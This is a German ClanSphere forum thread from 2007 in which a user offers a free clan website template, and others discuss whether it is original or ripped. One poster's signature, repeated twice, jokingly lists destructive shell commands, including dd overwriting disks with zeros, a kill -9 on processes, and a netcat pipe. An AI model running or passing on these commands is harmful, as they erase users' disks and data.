Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 16
Seite [1]
unLead


Wannabe poster




Beiträge: 25
# Thema - 05.07.2007 um 19:57 Uhr
Ich biete hier nen altes Clan Design von mir als Template an, ich hoffe es gefällt euch.

http://www.abload.de/image.php?img=aussehen2zwc.png

http://www.abload.de/image.php?img=aussehentpe.png


http://rapidshare.com/files/41202490/Template_1_Chris_G.rar

PS: Würde mich freuen wenns jemand ans clansphere anpasst, hab es leider nur ans bxcp damals angepasst, welches aber ja mitlerweile net mehr der neuste Stand ist,


Zuletzt editiert von unLead am 05.07.2007 um 20:00 Uhr (2x Editiert)
Inaktiv
Drag0n


Just nerd




Beiträge: 941
# Antwort: 1 - 05.07.2007 um 21:21 Uhr
joar sieht n1 aus kann man nix gegen sagen


------------------
MfG

Drag0n

ich gebe KEINEN ICQ oder MSN Support, es sei den ich schreibe euch an


Inaktiv
|
h4ze


Geekboy




Herkunft: Itzehoe
Beiträge: 1433
# Antwort: 2 - 05.07.2007 um 21:50 Uhr
wie viel?


------------------
gembee.com - Upload your Life!
A Social Filesharing Network
"Wie YouTube, nur für alle Datei-Typen"


Inaktiv
|
Fidan


King for a day



Herkunft: -----
Beiträge: 331
# Antwort: 3 - 05.07.2007 um 22:21 Uhr
ehm war das jetzt ernst gemeint haze? wenn ja der hat doch schon download link angegeben


Inaktiv
|
unLead
Thread-Ersteller


Wannabe poster




Beiträge: 25
# Antwort: 4 - 05.07.2007 um 22:41 Uhr
Ist vom styl leider eher ein weniger qualitativ hochwertiges Produkt, aber ist ja trozdem ganz nett .... wollte mal schauen ob free templates von mir ankommen ....

haze ist free

PS: Sehr schön wie sich Clansphere über die Jahre nun entwickelt hat Respekt an euch.


Zuletzt editiert von unLead am 05.07.2007 um 22:45 Uhr (2x Editiert)
Inaktiv
|
STB | Crystal


Rock the board




Herkunft: Alsdorf (bei Aachen
Beiträge: 50
# Antwort: 5 - 05.07.2007 um 22:50 Uhr
4 free ganz nice


------------------
Copyright by Tibor "Crystal" Stachoske
-------------------------------
°~ Chopmania °~ STB-Gaming °~ deviantART

Inaktiv
|
duRiel ClanSphere Team


Weltmeister




Herkunft: Cambridge
Beiträge: 7300
# Antwort: 6 - 05.07.2007 um 23:51 Uhr
das design sieht gut aus.. kenne das noch


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 7 - 06.07.2007 um 00:37 Uhr
2007-07-05 at 11:51 PM - duRiel:
das design sieht gut aus.. kenne das noch



Jep. Und ich würde mal sagen das dieses nicht so ganz mit deren Einverständnis hier einfach so angeboten wird.
Mir fällt nur gerade der Name von dem Clan nicht ein wo ich das gesehen habe :confused:


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
DopeK!cK


Going for pro



Herkunft: Syke (nähe Bremen)
Beiträge: 551
# Antwort: 8 - 06.07.2007 um 00:51 Uhr
Moin,

#1 Das Design wurde für Webspell gecodet
#2 Es fehlt das About
#3 Sieht aus wie Rip

Meine Meinung, weis nicht was die anderen davon halten.

MfG DopeK!cK


------------------
Mit freundlichen Grüßen

DopeK!cK

Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 9 - 06.07.2007 um 00:53 Uhr
2007-07-06 at 12:51 AM - DopeK!cK:
Moin,

#1 Das Design wurde für Webspell gecodet
#2 Es fehlt das About
#3 Sieht aus wie Rip

Meine Meinung, weis nicht was die anderen davon halten.

MfG DopeK!cK



Zu 1 und 2 will ich nichts sagen.
Aber zu 3 bin ich mir auhc zu 100% sicher. Es gab mal eine Seite die halt dieses Design hatte nur damals noch zu 0.2 Zeiten. Daher kenne ich das Design. Nur leider gibt es das BXCP-Archive nimme :-( da stand nähmlich genau diese Seite drin die ich meine


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
DopeK!cK


Going for pro



Herkunft: Syke (nähe Bremen)
Beiträge: 551
# Antwort: 10 - 06.07.2007 um 00:57 Uhr
Nagut, zu #1 wollte ich grade Editieren, da ich erst vermutet habe das es für Webspell ist wegen PHP, da ist mir eingefallen das es bei BXCP auch PHP Datein waren.
#2 Ich finde kein About oder bin ich Blind, es gab doch schon bei BXCP die About Pflicht oder nicht?
#3 Bin ich mir eigendlich auch sicher die Seite kenn ich irgendwo her.

MfG DopeK!cK


------------------
Mit freundlichen Grüßen

DopeK!cK

Inaktiv
|
4TWENTY


Rock the board




Herkunft: Basel
Beiträge: 78
# Antwort: 11 - 06.07.2007 um 01:01 Uhr
das design wurde nicht fuer webspell gecodet, das about fehlt weil es noch fuer 0.2 gecodet wurde und da war kein about "zwingend", ist kein rip da unLead dieses design selbst entworfen hat, hab mich sogar mal mit ihm persoenlich ueber eins von seinen designs unterhalten, bin mir also ziemlich sicher dass dieses sein werk ist


------------------


Publicons +-


Inaktiv
|
Fr33z3m4n ClanSphere Team


Medal of Honor




Herkunft: Hamm
Beiträge: 11094
# Antwort: 12 - 06.07.2007 um 01:05 Uhr
vlt. sind die anderen die Ripper

Alles Ripper hier oder wat ^^


------------------
mfg
Patrick "Fr33z3m4n" Jaskulski

Antoine de Saint-Exupéry: Wenn Du ein Schiff bauen willst, so trommle nicht Männer zusammen, um Holz zu beschaffen, Aufgaben zu verteilen, sondern lehre die Männer die Sehnsucht nach dem endlosen weiten Meer.

Inaktiv
|
DopeK!cK


Going for pro



Herkunft: Syke (nähe Bremen)
Beiträge: 551
# Antwort: 13 - 06.07.2007 um 01:06 Uhr
#1 Hatte ich verbessert, war mein Fehler.
#2 Dachte es wäre schon immer Pflicht, man kann sich auch täuschen.
#3 Kein Ahnung, weil irgendwo kenn ich das Design her, warte wir was unLead dazu sagt.

MfG DopeK!cK


------------------
Mit freundlichen Grüßen

DopeK!cK

Inaktiv
|
unLead
Thread-Ersteller


Wannabe poster




Beiträge: 25
# Antwort: 14 - 06.07.2007 um 12:24 Uhr
Zitat:

#1 Das Design wurde für Webspell gecodet
#2 Es fehlt das About
#3 Sieht aus wie Rip


#1 Ich hab vor langer Zeit mal seiten mit webspell gemacht, wo es noch nicht free war. Dieses Design war aber mit bxcp 0.2 bestück, kann leider nicht mehr sagen welche version genau, aber ist länger her. PS: Bin seit anbegin ein treuer fan von hajo.

#2 Jo hatte ich garnet dran gedacht ins Free template nen about mit in die navi, damals bei 0.2 hatten wir immer nen imprint link unten rechts mit drinne, das war ja ausreichent.

#3 Ich weiß nicht Also 75 psd daten auf meiner Festplatte mit dem Erstllungdatum 2 Juli 2005 bis 6 Januar 2007 sagen da etwas anderes (da kann man mal sehen wie oft psd daten wieder geöffnet werden um auch alte sachen wieder aufzugreifen ^^)

Das Design war auch mal on bei einem clan der hieß ri0t.de - deshalb hab ich auch geschrieben "ein altes" design - diese haben sich ja schon lange aufgelöst und der Admin r0cco war auch damals einverstanden das ich es weiter verwende. Außer dem waren alle meiner Clan sponsors nie damit verbunden das ich auch irgendwelche Rechte abtrete Allgemein wollte ich nur sehen ob die sachen noch ankommen und ich mir die Mühe machen kann, mein gesamtes privat portfolio als hier als free templates zuveröffentlichen(so als kleines dankeschön für alle die tolle zeit die ich damals mit bxcp 0.2 hatt ihr seit klasse .


Zuletzt editiert von unLead am 06.07.2007 um 12:27 Uhr (1x Editiert)
Inaktiv
|
4TWENTY


Rock the board




Herkunft: Basel
Beiträge: 78
# Antwort: 15 - 06.07.2007 um 15:13 Uhr
also mir gefaellt dieses, sowie auch alle anderen designs, die ich von dir gesehen hab, sehr gut!


------------------


Publicons +-


Inaktiv
|
h4ze


Geekboy




Herkunft: Itzehoe
Beiträge: 1433
# Antwort: 16 - 06.07.2007 um 15:47 Uhr
dl link hab ich mal wieder übersehn ^^


------------------
gembee.com - Upload your Life!
A Social Filesharing Network
"Wie YouTube, nur für alle Datei-Typen"


Inaktiv
|
Antworten: 16
Seite [1]


Sie müssen sich registrieren, um zu antworten.